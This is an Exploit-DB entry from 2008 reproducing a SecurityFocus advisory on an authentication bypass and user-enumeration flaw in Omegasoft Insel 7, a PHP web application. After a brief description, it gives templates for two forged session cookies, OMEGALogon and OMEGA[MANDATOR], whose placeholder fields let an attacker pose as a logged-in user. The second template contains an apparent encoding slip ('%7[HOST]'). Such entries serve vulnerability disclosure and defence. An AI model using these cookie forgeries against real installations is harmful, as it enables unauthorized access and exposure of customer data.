Omegasoft Insel 7 - Authentication Bypass / User Enumeration

EDB-ID:

31003


Author:

MC.Iglo

Type:

webapps


Platform:

PHP

Date:

2008-01-09


source: https://www.securityfocus.com/bid/27210/info

Omegasoft Insel is prone to an authentication bypass vulnerability and a user-enumeration weakness.

An attacker can exploit these issues to obtain sensitive information and gain unauthorized access to the application.

These issues affect Omegasoft Insel 7; other versions may also be affected. 

Cookiename: OMEGALogon
value:[MANDATOR]%7C[CUSTOMERNUMBER]%7C[USERID]%7C%7CArial%7CArial%7C%2D%2D%2D%2D%2D%2D%7C[SURNAME]%2C+[NAME]%7C%7C%7C[LASTLOGINTIME]%7C

Cookiename: OMEGA[MANDATOR]
value: [USERID]%7C[CUSTOMERNUMBER]%7[HOST]%7C[DATE]%7C